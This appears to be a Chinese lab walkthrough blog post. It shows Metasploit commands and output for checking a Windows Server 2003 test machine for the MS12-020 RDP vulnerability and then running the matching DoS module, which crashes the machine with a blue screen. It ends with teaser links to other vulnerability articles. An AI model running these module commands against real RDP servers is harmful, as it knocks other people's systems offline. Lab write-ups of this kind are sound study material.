使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程

　

ms12-020

前言

攻击者向受影响的系统发送一系列特制 RDP 数据包，则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下，任何 Windows 操作系统都未启用远程桌面协议 (RDP，默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。

0x01 实验环境

攻击机：kali linux

ip:192.168.8.130

目标机：windows server 2003 Enterprise x64 SP2

ip:192.168.8.129

0x02 漏洞验证

使用msf的模块：auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

       Name: MS12-020 Microsoft Remote Desktop Checker
     Module: auxiliary/scanner/rdp/ms12_020_check
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis "R3dy" <[email protected]>
  Brandon McCann "zeknox" <[email protected]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
  This module checks a range of hosts for the MS12-020 vulnerability. 
  This does not cause a DoS on the target.

References:
  https://cvedetails.com/cve/CVE-2012-0002/
  https://technet.microsoft.com/en-us/library/security/MS12-020
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020
  https://www.exploit-db.com/exploits/18606
  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

运行后显示目标系统具有此漏洞：

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x03 漏洞利用

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.8.129    yes       The target address
   RPORT  3389             yes       The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

运行模块后，目标系统windows server 2003 蓝屏宕机：

相关阅读

【S2-045】 Struts2远程命令执行漏洞(CVE-2017-5638)

实验环境 操作机：Windows XP 目标机：Centos 6.5 Struts版本：2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实

discuz7.2sql注入漏洞

今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码，在本地搭建漏洞环境 h

openssl-heartbleed漏洞学习

了解漏洞 Heartbleed漏洞： Heartbleed漏洞是openssl的一个漏洞，这个严重漏洞(CVE-2014-0160)的产生是由于未能在memcpy()调用受害

NetBIOS 漏洞的入侵与防御

1. 漏洞描述NetBIOS 即Network Basic Input Output System（网络基本输入输出系统），是一种应用程序接口(API)，系统可以利用W I N S 服

ssl漏洞解决方案（ssl漏洞LogJam）

近日由密西根大学、约翰霍普金斯大学、微软研究中心及法国Inria Nancy-Grand Est、 Inria Paris-Rocquencourt等组成的研究团队发